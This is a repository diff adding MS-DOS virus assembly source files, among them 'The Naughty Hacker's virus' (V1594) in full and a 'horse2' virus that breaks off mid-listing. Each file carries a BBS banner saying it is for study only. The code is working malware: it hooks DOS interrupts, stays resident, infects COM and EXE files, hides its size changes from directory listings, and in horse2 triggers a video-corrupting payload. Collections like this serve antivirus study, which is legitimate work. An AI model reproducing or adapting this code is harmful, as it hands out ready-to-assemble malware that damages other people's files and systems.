DS + PUSH DS + POP ES + CALL SUB_10 + RETN +SUB_11 ENDP + + +SEG_A ENDS + + + + END START + + + + + Rock Steady [NuKE] + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.horse.asm b/MSDOS/Virus.MSDOS.Unknown.horse.asm new file mode 100644 index 00000000..b087a0b7 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.horse.asm @@ -0,0 +1,1009 @@ +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + .radix 16 + + + ;********************************* + ;* The Naughty Hacker's virus * + ;*VERSION 3.1 (And not the last.)* + ;* ( V1594 ) * + ;* Finished on the 10.04.1991 * + ;* * + ;* Glad to meet you friend! * + ;* * + ;********************************* + +; +; "It's hard to find a black cat in a dark room, especially if it's not there." +; +; V1594 ( !@!?!). +; () , +; , +; , +; . +; ...... +; +; TURBO ASSEMBLER Ver 1.03B. +; .... +; +; VIRUSWRITERS ! +; +; +; To be continued ... +; + + + call Start_Virus + mov dx,offset Hellomsg + mov ah,9 + int 21 + int 20 + +Hellomsg db 0a,0dh,7,'HI WORLD,GIVE ME COMMAND.COM !!!',0a,0dh,7,'$' + + Virus_lenght equ endcode-adjust + alllen equ buffer-adjust + + adjust label word + + + IP_save label word + + First_3 Label Byte + ;For .COM file here stores + ret + nop + nop + + CS_save dw ? ;The first 3 bytes + SP_save dw ? + SS_save dw 0FFFF ;0FFFF For COM files + + +signature: + + db 'N.Hacker' ;It's me the HORSE !!! + +date_stamp: + + dd 10041991 ;10.04.1991 + +Run_The_Program: + + pop ds ;Restore saved ds,es,ax + pop es ;ds=es=PSP + pop ax + cmp cs:[bp+SS_save-adjust],0FFFF ;Run the infected program + je Run_COM_File + + mov ax,ds ;Calculate load segment + add ax,10 + mov bx,ax + add ax,cs:[bp+CS_save-adjust] ;Calculate CS value + add bx,cs:[bp+SS_save-adjust] ;Calculate SS value + mov ss,bx ;Run .EXE program + mov sp,word ptr cs:[bp+SP_save-adjust] + push ax + push word ptr cs:[bp+IP_save-adjust] + retf + +Run_COM_File: + + mov di,100 + mov si,bp + movsb ;Restore the first 3 bytes + movsw ;Run .COM program + mov bx,100 + push bx + sub bh,bh + ret + +;******************************************************************* +; * +; This is the program entry.... * +; * +;******************************************************************* + + +Start_Virus: + + call Get_IP ;This is to get the IP value. + +Get_IP: + pop bp ;Get it in BP. + sub bp,Get_IP-adjust ;adjust BP point to the begining + cld ;Clear direction flag + push ax ;Save some registres + push es + push ds + mov es,[2] ;get last segment + mov di,Run_The_Program-adjust ;(last segment=segment of virus) + + push ds + push cs + pop ds + mov si,di + add si,bp + mov cx,endcode-Run_The_Program + rep cmpsb ;check if virus is in memory + pop ds + push ds + pop es + je Run_The_Program ;If so then run the program + + mov word ptr cs:[bp+handle-adjust],0ffff ;set handle_save + mov ax,ds + dec ax + mov ds,ax ;ds=MCB + sub word ptr [3],80 ;Set block size + sub word ptr [12],80 ;Set last segment + mov es,[12] ;steal some memory (2K) + push cs + pop ds + sub di,di + mov si,bp ;prepare to move in high mem + mov cx,alllen ;will move virus+variables + rep movsb ;copy there + push cs + mov ax,Run_The_Program-adjust + add ax,bp + push ax + push es + mov ax,offset Set_Vectors-adjust ;Set vectors + push ax + retf + +Find_First_Next: + + call Call_Original_INT_21h ;fuck when do the dir command + push bx + push es + push ax + or al,al + jnz Go_Out_ ;if error + + mov ah,2f ;get DTA address + int 21 + + mov al,byte ptr es:[bx+30d] ;Seconds in al + and al,31d ;Mask seconds + cmp al,60d/2 ;Seconds=60? + jne Go_Out_ + + mov ax,es:[bx+36d] + mov dx,es:[bx+38d] ;Check File size + cmp ax,Virus_lenght*2 + sbb dx,0 + jb Go_Out_ + + +Adjust_Size: + + sub es:[bx+28d+7+1],Virus_lenght ;Adjust size + sbb es:[bx+28d+2+7+1],0 + +Go_Out_: + + pop ax + pop es ;Return to caller + pop bx + iret + +Find_First_Next1: + + call Call_Original_INT_21h + pushf + push ax + push bx ;fuck again + push es + jc Go_Out_1 + + mov ah,2f + int 21 + + mov al,es:[bx+22d] + and al,31d + cmp al,60d/2 + jne Go_Out_1 + + mov ax,es:[bx+26d] + mov dx,es:[bx+28d] + cmp ax,Virus_lenght*2 + sbb dx,0 + jb Go_Out_1 + +Adjust_Size1: + + sub es:[bx+26d],Virus_lenght + sbb es:[bx+28d],0 + +Go_Out_1: + + pop es + pop bx + pop ax ; Dummy proc far + popf ; ret 2 + db 0ca,2,0 ;retf 2 ; Dummy endp => BUT too long... + + + ;************************************* + ; * + ; Int 21 entry point. * + ; * + ;**************************:KIIII***** + + + +INT_21h_Entry_Point: + + + cmp ah,11 + je Find_First_Next ;Find First Next (old) + cmp ah,12 + je Find_First_Next + + cmp ah,4e ;Find First Next (new) + je Find_First_Next1 + cmp ah,4f + je Find_First_Next1 + + cmp ah,6ch + jne not_create ;Create (4.X) + test bl,1 + jz not_create + jnz create + +not_create: + + cmp ah,3ch ;Create (3.X) + je create + cmp ah,5bh + je create + + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + + mov byte ptr cs:[function-adjust],ah + + cmp ah,6ch ;Open (4.X) + je create_ + + cmp ah,3e ;Close + je close_ + + cmp ax,4b00 ;Exec + je Function_4Bh + + cmp ah,17 ;Rename (old) + je ren_FCB + + cmp ah,56 ;Rename (new) + je Function_4Bh + + cmp ah,43 ;Change attributes + je Function_4Bh + + cmp ah,3dh ;Open (3.X) + je open + +Return_Control: + + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + +Go_out: + + jmp dword ptr cs:[current_21h-adjust] ;go to the old int 21 + +create_: + + or bl,bl ;Create file? + jnz Return_Control + mov dx,si + jmp Function_4Bh + +ren_FCB: + + cld + inc dx + mov si,dx + mov di,offset buffer-adjust + push di + push cs + pop es ;Convert FCB format Fname into ASCIIZ string + mov cx,8 + rep movsb + mov al,'.' + stosb + mov cx,3 + rep movsb + sub al,al + stosb + pop dx + push cs + pop ds + jmp Function_4Bh + +create: + +; cmp word ptr cs:[handle-adjust],0ffff +; jne Go_out + + call Call_Original_INT_21h + jc Error + mov word ptr cs:[handle-adjust],ax + jnc Exit_ +Error: + mov word ptr cs:[handle-adjust],0ffff ;Useless +Exit_: +; retf 2 + db 0ca,2,0 + +close_: + cmp word ptr cs:[handle-adjust],0ffff + je Return_Control + cmp bx,word ptr cs:[handle-adjust] + jne Return_Control + + mov ah,45 + call Infect_It + mov word ptr cs:[handle-adjust],0ffff + jmp Return_Control + +Function_4Bh: + + mov ax,3d00h +open: + call Infect_It + jmp Return_Control + +;****************************************** +; * +; This infects the programs... * +; * +;****************************************** + +Infect_It: + + call Call_Original_INT_21h ;this is the infecting part + jnc No_error + ret + +No_error: + + xchg ax,bp + mov byte ptr cs:[flag-adjust],0 + mov ah,54 + call Call_Original_INT_21h + mov byte ptr cs:[veri-adjust],al + cmp al,1 ;Switch off verify... + jne Go_On_Setting + mov ax,2e00 + call Call_Original_INT_21h + +Go_On_Setting: + + push cs + push cs + pop ds + pop es + mov dx,offset DOS_13h-adjust + mov bx,dx ;Set New DOS int 13h + mov ah,13 + call Call_Original_INT_2Fh + + mov ax,3513 + call Call_Original_INT_21h + push bx + push es + + mov word ptr cs:[current_13h-adjust],bx + mov word ptr cs:[current_13h-adjust+2],es + + mov ah,25 + mov dx,INT_13h_entry-adjust ;Set int 13h + push cs + pop ds + call Call_Original_INT_21h + + mov ax,3524 + call Call_Original_INT_21h + push bx + push es + + mov ah,25 + mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...). + call Call_Original_INT_21h + + xchg bx,bp + push bx + mov ax,1220 + call Call_Original_INT_2Fh + mov bl,es:[di] ;Remember the good old V512 ? + mov ax,1216 + call Call_Original_INT_2Fh + pop bx + add di,11 + + mov byte ptr es:[di-15d],2 + mov ax,es:[di] + mov dx,es:[di+2] + cmp ax,Virus_lenght+1 + sbb dx,0 + jnb Go_on + jmp close +Go_on: + cmp byte ptr cs:[function-adjust],3dh + je Scan_name + cmp byte ptr cs:[function-adjust],6ch + jne Dont_Scan_Name + +Scan_name: + + push di + add di,0f + mov si,offset fname-adjust ;wasn't that the last opened file? + cld + mov cx,8+3 + rep cmpsb + pop di + jne Dont_Scan_Name + jmp close + +Dont_Scan_Name: + + cmp es:[di+18],'MO' + jne Check_For_EXE ;check for .COM file + cmp byte ptr es:[di+17],'C' + jne Check_For_EXE + jmp com + +Check_For_EXE: + + cmp es:[di+18],'EX' + jne Not_good ;check for .EXE file + cmp byte ptr es:[di+17],'E' + je Check_For_Valid_EXE + +Not_good: + + jmp close + +Check_For_Valid_EXE: + + call Read_First_18 + cmp word ptr [si],'ZM' + je Valid_EXE ;check for valid .EXE file + cmp word ptr [si],'MZ' + je Valid_EXE + jmp close + + Valid_EXE: + + cmp word ptr [si+0c],0ffff ;only low-mem .EXE + je Low_Mem + jmp close + +Low_Mem: + + mov cx,[si+16] + add cx,[si+8] ;Something common with EDDIE.. + mov ax,10 + mul cx + add ax,[si+14] + adc dx,0 + mov cx,es:[di] + sub cx,ax + xchg cx,ax + mov cx,es:[di+2] + sbb cx,dx + or cx,cx + jnz Not_Infected_EXE ;infected? + cmp ax,(endcode-Start_Virus) + jne Not_Infected_EXE + jmp close + +Not_Infected_EXE: + + mov ax,[si+10] + mov [SP_save-adjust],ax + mov ax,[si+0e] + mov [SS_save-adjust],ax + mov ax,[si+14] + mov [IP_save-adjust],ax + mov ax,[si+16] + mov [CS_save-adjust],ax ;set the new header + mov ax,es:[di] + mov dx,es:[di+2] + + add ax,Virus_lenght + adc dx,0 + mov cx,200 ;(C) by Lubo & Jan... + div cx + mov [si+2],dx + or dx,dx + jz OK_MOD + inc ax + +OK_MOD: + mov [si+4],ax + mov ax,es:[di] + mov dx,es:[di+2] + + mov cx,4 + push ax + +Compute: + + shr dx,1 + rcr ax,1 + loop Compute + pop dx + and dx,0f + + sub ax,[si+8] + add dx,Start_Virus-adjust + adc ax,0 + mov [si+14],dx + mov [si+16],ax + add ax,(Virus_lenght)/16d+1 + mov [si+0eh],ax + mov [si+10],100 + write: + mov ax,5700 + call Call_Original_INT_21h + push cx + push dx + + sub cx,cx + mov es:[di+4],cx + mov es:[di+6],cx + mov cl,20 + xchg cl,byte ptr es:[di-0dh] + push cx + mov ah,40 ;this writes the first few bytes and glues the virus + mov dx,buffer-adjust + mov cx,18 + + call Call_Original_INT_21h + mov ax,es:[di] + mov es:[di+4],ax + mov ax,es:[di+2] + mov es:[di+6],ax + call Check_For_COMMAND ;(C) + jne Dont_Adjust_Size + sub es:[di+4],Virus_lenght + sbb es:[di+6],0 ;??????????????????????????????? + +Dont_Adjust_Size: + + mov ah,40 + sub dx,dx + mov cx,Virus_lenght + call Call_Original_INT_21h + + pop cx + mov byte ptr es:[di-0dh],cl + pop dx + pop cx + + cmp byte ptr cs:[flag-adjust],0ff + je Set_Time_and_Date +exit: + call Check_For_COMMAND + je Set_Time_and_Date + and cl,11100000b + or cl,60d/2 + +Set_Time_and_Date: + + mov ax,5701 + call Call_Original_INT_21h +close: + + mov ah,3e + call Call_Original_INT_21h + push es + pop ds + mov si,di + add si,0f + mov di,fname-adjust + push cs + pop es + mov cx,8+3 ;save the fname to a quit place + cld + rep movsb + push cs + pop ds + + cmp byte ptr cs:[flag-adjust],0ff + jne Dont_Clear_Buffers + mov ah,0dh ;if error occured->clear disk buffers + + call Call_Original_INT_21h + +Dont_Clear_Buffers: + + les bx,[org_13h-adjust] + lds dx,[org_13h-adjust] + mov ah,13 + call Call_Original_INT_2Fh + + cmp byte ptr cs:[veri-adjust],1 + jne Restore_Vectors + mov ax,2e01 + + call Call_Original_INT_21h + +Restore_Vectors: + + sub ax,ax + mov ds,ax + pop [24*4+2] + pop [24*4] + pop [13*4+2] + pop [13*4] ;restore vectors and return + ret + com: + test byte ptr es:[di-0dh],4 ;if it is a system file + jnz Not_OK_COM_File ;I had some problems here with + ;V1160 & V1776 (with the ball) + cmp es:[di],65535d-Virus_lenght*2-100 + ja Not_OK_COM_File + + call Read_First_18 + cmp byte ptr [si],0E9 + jne OK_COM_file + mov ax,es:[di] + sub ax,[si+1] ;infected? + cmp ax,(endcode-Start_Virus+3) + je Not_OK_COM_File + +OK_COM_file: + + mov word ptr [SS_save-adjust],0FFFF + push si + lodsb + mov word ptr [First_3-adjust],ax + lodsw + mov word ptr [First_3-adjust+1],ax + pop si + mov ax,es:[di] + add ax,Start_Virus-adjust-3 + call Check_For_COMMAND + jne Normally + sub ax,Virus_lenght + +Normally: + + mov byte ptr [si],0E9 + mov word ptr [si+1],ax + jmp write + +Not_OK_COM_File: + + jmp close + +Set_Vectors: + + sub ax,ax + mov ds,ax + + push [1*4] + push [1*4+2] ; <= (C) by N.Hacker. + + pushf + pushf + pushf + pushf + + mov byte ptr cs:[flag-adjust],ah + mov byte ptr cs:[my_flag-adjust],ah + mov word ptr cs:[limit-adjust],300 + mov word ptr cs:[mem_-adjust],org_21h-adjust + + mov [1*4],offset trap-adjust + mov [1*4+2],cs + + call set_trace + + mov ax,3521 + + call dword ptr [21h*4] + + + mov byte ptr cs:[flag-adjust],0 + mov word ptr cs:[mem_-adjust],org_2fh-adjust + + call set_trace + + mov ax,1200 + + call dword ptr [2fh*4] ;do trace int 2f + + + mov byte ptr cs:[flag-adjust],0 + mov byte ptr cs:[my_flag-adjust],0FF + mov word ptr cs:[limit-adjust],0C800 + mov word ptr cs:[mem_-adjust],org_13h-adjust + + call set_trace + + sub ax,ax + mov dl,al + + call dword ptr [13h*4] ;do trace int 13 + + mov byte ptr cs:[flag-adjust],0 + mov word ptr cs:[limit-adjust],0F000 + mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust + + call set_trace + + sub ax,ax + mov dl,al + + call dword ptr [13h*4] + + pop [1*4+2] + pop [1*4] + + les ax,[21*4] + mov word ptr cs:[current_21h-adjust],ax ;get old int 21 + mov word ptr cs:[current_21h-adjust+2],es + mov [21*4], INT_21h_Entry_Point-adjust ;set it + mov [21*4+2],cs + retf + +set_trace: + + pushf + pop ax + or ax,100 + push ax + popf + ret + +trap: + push bp + mov bp,sp + push bx + push di + cmp byte ptr cs:[flag-adjust],0ff + je off + mov di,word ptr cs:[mem_-adjust] + mov bx,word ptr cs:[limit-adjust] + cmp [bp+4],bx + pushf + cmp word ptr cs:[my_flag-adjust],0ff + jne It_Is_JA + + popf + jb Go_out_of_trap + jmp It_Is_JB + +It_Is_JA: + + popf + ja Go_out_of_trap + +It_Is_JB: + + mov bx,[bp+2] + mov word ptr cs:[di],bx + mov bx,[bp+4] + mov word ptr cs:[di+2],bx + mov byte ptr cs:[flag-adjust],0ff +off: + and [bp+6],0feff + +Go_out_of_trap: + + pop di + pop bx + pop bp + iret + +Call_Original_INT_21h: + + pushf + call dword ptr cs:[org_21h-adjust] + ret + +Call_Original_INT_2Fh: + + pushf + call dword ptr cs:[org_2fh-adjust] + ret + +INT_24h_entry: + + mov al,3 + iret + +;************************** +; (C) by N.Hacker. * +; (bellow) * +;************************** + +INT_13h_entry: + + mov byte ptr cs:[next_flag-adjust],0 + + cmp ah,2 + jne Other + + cmp byte ptr cs:[function-adjust],03Eh + jne Dont_hide + + dec byte ptr cs:[next_flag-adjust] + inc ah + jmp Dont_hide + +Other: + + cmp ah,3 + jne Dont_hide + + cmp byte ptr cs:[flag-adjust],0ff + je no_error_ + + cmp byte ptr cs:[function-adjust],03Eh + je Dont_hide + + inc byte ptr cs:[next_flag-adjust] + dec ah + +Dont_hide: + + pushf + call dword ptr cs:[current_13h-adjust] + jnc no_error_ + mov byte ptr cs:[flag-adjust],0ff + +no_error_: + + clc + db 0ca,02,0 ;retf 2 + + +DOS_13h: + + cmp byte ptr cs:[next_flag-adjust],0 + je OK + + cmp ah,2 + je Next + cmp ah,3 + jne OK +Next: + cmp byte ptr cs:[next_flag-adjust],1 + jne Read + inc ah + jne OK +Read: + + dec ah +OK: + test dl,80 + jz Floppy + jmp dword ptr cs:[org_13h-adjust] +Floppy: + jmp dword ptr cs:[Floppy_org_13h-adjust] + + +Read_First_18: + + sub ax,ax + mov es:[di+4],ax + mov es:[di+6],ax + mov ah,3f + mov cx,18 + mov dx,buffer-adjust + mov si,dx + call Call_Original_INT_21h + ret + +Check_For_COMMAND: + + cmp es:[di+0f],'OC' + jne Not_COMMAND + cmp es:[di+11],'MM' + jne Not_COMMAND + cmp es:[di+13],'NA' + jne Not_COMMAND ;check for command.com + cmp es:[di+15],' D' + jne Not_COMMAND + cmp es:[di+17],'OC' + jne Not_COMMAND + cmp byte ptr es:[di+19],'M' + +Not_COMMAND: + + ret + +endcode label word + + current_21h dd ? + null dd ? ;I forgot to remove this variable... + current_13h dd ? + org_2fh dd ? + org_13h dd ? + org_21h dd ? + Floppy_org_13h dd ? + flag db ? ;0ff if error occures + veri db ? + handle dw ? + fname db 8+3 dup (?) + function db ? + my_flag db ? + limit dw ? + mem_ dw ? + next_flag db ? + +buffer label word + +;****************************************************************************; +; ; +; -=][][][][][][][][][][][][][][][=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] [=- ; +; -=] For All Your H/P/A/V Files [=- ; +; -=] SysOp: Peter Venkman [=- ; +; -=] [=- ; +; -=] +31.(o)79.426o79 [=- ; +; -=] P E R F E C T C R I M E [=- ; +; -=][][][][][][][][][][][][][][][=- ; +; ; +; *** NOT FOR GENERAL DISTRIBUTION *** ; +; ; +; This File is for the Purpose of Virus Study Only! It Should not be Passed ; +; Around Among the General Public. It Will be Very Useful for Learning how ; +; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; +; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; +; Experience can Turn it Into a far More Malevolent Program Than it Already ; +; Is. Keep This Code in Responsible Hands! ; +; ; +;****************************************************************************; + +;; +;> and Remember Don't Forget to Call <; +;> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <; +;; + diff --git a/MSDOS/Virus.MSDOS.Unknown.horse2.asm b/MSDOS/Virus.MSDOS.Unknown.horse2.asm new file mode 100644 index 00000000..a8a52dfc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.horse2.asm @@ -0,0 +1,558 @@ + .model tiny + .code + .radix 16 + +ASSUME DS:CODE,SS:CODE,CS:CODE,ES:CODE + + org 0100h + CALL EntryPoint ; Call virus entry point + +; Here begin virus by himself + +EntryPoint: + POP BP ; Restore in BP address of data area + PUSH BX ; Save BX + PUSH CX ; Save CX + PUSH ES ; Save ES + PUSH DS ; Save DS + CLC ; Clear carry flag + MOV AX,4B4Bh ; Load AX with self-check word + INT 21 ; Call int21 + JC Install ; If virus is loaded CF==0 + + PUSH DS ; Save DS + PUSH CS ; Set DS point to PSP + POP DS ; + MOV SI,DI ; SI=DI= virus CODE begin + SUB SI,0003 ; include CALL in the beginning + ADD SI,BP ; Adjust different offsets + MOV CX,047Ch ; Compare virus code only + CLD ; Clear direction + REP CMPSB ; Repeat until equal + POP DS ; Restore DS + PUSH DS ; Set ES = DS + POP ES + JZ ReturnControl ; If virus -> return to file + +Install: + MOV CS:[offset FunCounter+BP],3456 ; Load generation counter + MOV AX,DS ; Move PSP segment in AX + DEC AX ; Compute MCB of PSP + + MOV DS,AX ; Set DS to MCB + SUB [0003],0050 ; "Steal" some memory + MOV AX,ES:[0002] ; ???? + SUB AX,0050 ; ???? + MOV ES:[0002],AX ; + PUSH AX ; Save new virus segment + SUB DI,DI ; DI=0 + + MOV SI,BP ; SI point to virus begin + SUB SI,0003 ; Adjust CALL in the beginning + MOV DS,DI ; DS set to 0 + MOV BX,Offset int21handler ; Load BX with int 21 handler + XCHG BX,[0084] ; and set it in vector table + MOV CS:[BP+offset Int21off],bx ; Save old vector offset + XCHG AX,[0086] ; Set new int21 seg & get old segment + MOV CS:[BP+offset Int21seg],ax ; Save old vector segment + POP ES ; Set ES point to new virus seg + PUSH CS ; Set DS point to current virus seg (PSP) + POP DS ; + MOV CX,offset LastByte ; Will move all virus + REP MOVSB ; Move virus in hi memory (as Eddie) + + MOV AX,4BB4h ; Int21 is grabbed by virus + INT 21 ; This SetUp virus function +ReturnControl: + POP DS ; Restore DS + POP ES ; Restore ES + CMP byte ptr CS:[BP+ComFlag],43 ; Check if host file is COM + JZ ReturnCOM ; If COM -> exit COM +ReturnEXE: + MOV AX,CS:[BP+First3] ; Load AX with old IP + MOV DX,CS:[BP+First3+2] ; Load AX with old CS + MOV CX,CS ; Load CX with current run segment + SUB CX,CS:[BP+06] ; Calculate PSP+10h + MOV DI,CX ; Save result in DI + ADD DX,CX ; In DX is now start segment + POP CX ; ??? + POP BX ; ??? + CLI ; Disable interrupts + ADD DI,CS:[BP+04] + MOV SS,DI + STI +DoReturn: ; 009B + PUSH DX ; Push entry segment + PUSH AX ; Push entry offset + + SUB AX,AX ; Clear registers + SUB DX,DX ; Clear of AX may cause trouble + SUB BP,BP ; with several programs (as DISKCOPY) + SUB SI,SI ; AX must be saved on entry and restored + SUB DI,DI ; + RETF ; Return control to EXE file + +ReturnCOM: + POP CX ; ??? + POP BX ; ??? + MOV AX,[BP+First3] ; Load AX with first 2 instr + MOV [0100],AX ; and restore them at file begin + MOV AX,[BP+First3+2] ; Load AX with second 2 instr + MOV [0102],AX ; and restore them at file begin + MOV AX,0100 ; Set AX to entry offset + MOV DX,CS ; Set DX to entry segment + JMP short DoReturn ; Go to return code + +FindFirstNext: + PUSHF ; Save flags + CALL dword ptr CS:[offset Dos21off] ; Call DOS + PUSH BX ; Save rezult of searching + PUSH ES + PUSH SI + PUSH AX + MOV SI,DX ; DS:SI point to FCB with search argument + CMP byte ptr [SI],0FFh ; Check for Extended FCB + JNZ NoDirCommand ; If FCB not extended then command is not DIR + MOV AH,2Fh ; Get DTA address; Result of search is in DTA + INT 21 + MOV AX,ES:[BX+1Eh] ; Load file time to AX + AND AX,001Fh ; Mask seconds + CMP AX,001Fh ; Check if file seconds are 62 + JNZ NoDirCommand ; If seconds!=62 -> file not infected + CMP ES:[BX+26h],0000 ; Check file size, hi byte + JNZ AdjustSize ; If file bigger than 64K -> immediate adjust + CMP ES:[BX+24h],offset LastCode ; Check low byte of file size + JC NoDirCommand ; If file is less than virus -> skip adjust +AdjustSize: + SUB ES:[BX+24h],offset LastCode ; Decrement file size with virus size + SBB ES:[BX+26h],0000 ; Decrement hi byte of size if need + +NoDirCommand: + POP AX ; Restore registers + POP SI + POP ES + POP BX + IRET ; Return to caller + +HereIam: + PUSH CS ; If AX==4B4B -> so virus call me + POP ES ; Set ES to virus segment + MOV DI,000C ; Set DI to virus code begin + IRET ; Return to caller +Int21handler: + CMP AH,11h ; If function is FindFirst + JZ FindFirstNext ; If so -> will adjust file size + CMP AH,12h ; If function is FindNext + JZ FindFirstNext ; If so -> will adjust file size + CMP AX,4B4Bh ; If AX==4B4B -> Identification + JZ HereIam ; function + CMP AX,4BB4h ; Setup function + JNZ Continue ; Continue checking of AH + JMP SetUp +Continue: + PUSH AX ; Save important registers + PUSH BX + PUSH CX + PUSH DX + PUSH SI + PUSH DI + PUSH BP + PUSH DS + PUSH ES + + CMP AH,3Eh ; If function CLOSE file handle + JZ CloseFile ; + CMP AX,4B00h ; If function is EXEC file + MOV AH,3Dh ; If so set AH to OPEN function + JZ Infect ; and infect file +ErrorProcess: + MOV AX,CS:[offset FunCounter] ; Load nomer pored na function + CMP AX,0000 ; If counter is != 0 + JNZ AdjustFunCount ; then only decrease counter + JMP VideoFuck ; else go to video fuck +AdjustFunCount: + DEC AX + MOV CS:[04A0h],AX +EndInt21: + POP ES ; Restore important registers + POP DS + POP BP + POP DI + POP SI + POP DX + POP CX + POP BX + POP AX + JMP dword ptr CS:[offset Int21off] ; Jump to DOS + + DB 9A ; ?????? + +CloseFile: + MOV AH,45 +Infect: + CALL CallDOS ; Call DOS int 21 + JC ErrorProcess ; If error -> Stop processing + MOV BP,AX ; Save file handle in BP + MOV AX,3508 ; Get timer interrupt + CALL CallDOS + MOV CS:[offset TimerOff],BX ; and save it in variable + MOV CS:[offset TimerSeg],ES + PUSH BX ; and to stack + PUSH ES + MOV AL,21 ; Get in21 + CALL CallDOS + PUSH BX ; and save it on stack + PUSH ES + MOV AL,24 ; Get critical error int + CALL CallDOS + PUSH BX ; and store it on stack + PUSH ES + MOV AL,13 ; Get int 13 (disk I/O) + CALL CallDOS + PUSH BX ; and save it on stack + PUSH ES + MOV AH,25 ; Now he will SET vectors + LDS DX,dword ptr CS:[offset Int13off] ; Load int13 bios address + CALL CallDOS ; Set it in vector table + MOV AL,21 + LDS DX,dword ptr CS:[offset Dos21off] ; Load int21 dos address + CALL CallDOS ; Set in vector table + MOV AL,24 ; Will set critical error handler + PUSH CS + POP DS ; Set DS point to vurus segment + MOV DX,offset CriticalError ; Load its own critical handler + INT 21 ; Set in vector table + MOV AL,08 ; Set new timer + MOV DX,offset TimerHandler ; Load its own timer + INT 21 ; Set in vector table + MOV BX,BP ; Restore file handle from BP to BX + PUSH BX ; Save handle on stack + MOV AX,1220 ; Get handle table number + CALL CallInt2F ; Via int2F (undocumented) + MOV BL,ES:[DI] ; Load table number in BL + MOV AX,1216 ; Get table address + CALL CallInt2F ; Via int2F (undocumented) + POP BX ; Restore file handle + ADD DI,0011 ; ES:DI point to file size + MOV byte ptr ES:[DI-0Fh],02 ; Set file open mode (3Dxx) to Read/Write + MOV AX,ES:[DI] ; Load DX:AX with file size + MOV DX,ES:[DI+02] ; + CMP DX,0000 ; Check if file is less than 64k + JNZ BigEnough ; If less + CMP AX,offset LastCode ; Then check if file is less than virus + JNC BigEnough ; If file is larger than virus -> fuck it + JMP SkipFile ; else skip file +BigEnough: + MOV [offset FileSizeLow],AX ; Save file size in variables + MOV [offset FileSizeHi],DX + SUB AX,offset VirusAuthor-offset EndAuthor ; Decrease file size with sign size + SBB DX,0000 ; + MOV ES:[DI+04],AX ; Set current file position to point + MOV ES:[DI+06],DX ; Virus sign + PUSH DI ; Save table handle table address + PUSH ES ; + MOV AH,3F ; Will read from file + MOV CX,offset EndAuthor-offset VirusAuthor + MOV DX,offset LastByte ; Load DS:DX point AFTER virus + MOV DI,DX ; DI point this area either + INT 21 ; Read file + MOV SI,Offset VirusAuthor ; DS:SI point virus sign + MOV CX,offset EndAuthor-offset VirusAuthor ; Load CX sign size + PUSH CS ; ES:DI point to readed byte + POP ES ; + REP CMPSB ; Compare virus sign with readed bytes + POP ES ; Restore handle table address + POP DI ; + JNZ CleanFile ; If not equal -> file is clean + JMP SkipFile ; Else file infected -> skip it +CleanFile: MOV ES:[DI+04],0000 ; Set file pointer to 0L + MOV ES:[DI+06],0000 + MOV AH,3F ; Will read EXE header + MOV CX,001B ; Size of EXE header + MOV DX,offset LastByte ; Read in buffer AFTER virus + MOV SI,DX ; Set DS:SI point to readed header + INT 21 ; Read header + JNC NoErrorHeader ; If no error in read -> go ahead + JMP SkipFile ; If error occur -> skip file +NoErrorHeader: CMP ES:[DI+18],4D4F ; Check in table if file is ?OM + JNZ NoComFile + JMP InfectCOM +NoComFile: CMP ES:[DI+18],4558 ; Check for ?XE file + JZ CheckForEXE ; If so -> infect it + JMP SkipFile ; Else skip file + +CheckForEXE: CMP ES:[DI+17],45 ; Check if file is realy an EXE-named + JZ CheckEXEsign ; If so -> check for MZ,ZM + JMP SkipFile ; Else skip file + +CheckEXEsign: CMP [SI],5A4Dh ; Check for MZ + JZ InfectEXE ; If so -> infect file + CMP [SI],4D5Ah ; Check for ZM + JZ InfectEXE ; If so -> infect file + JMP SkipFile ; Otherwise -> skip file + +InfectEXE: MOV byte ptr [ComFlag],45h ; Set file type flag to EXE + MOV AX,[SI+0Eh] ; Load AX with EXE file SS + MOV [SSegment],AX ; and save it + MOV AX,[SI+14h] ; Load AX with EXE header IP + MOV [IPointer],AX ; and save it + MOV AX,[SI+16h] ; Load AX with EXE header CS + MOV [CSegment],AX ; And save it + MOV DX,offset LastCode ; Load DX with 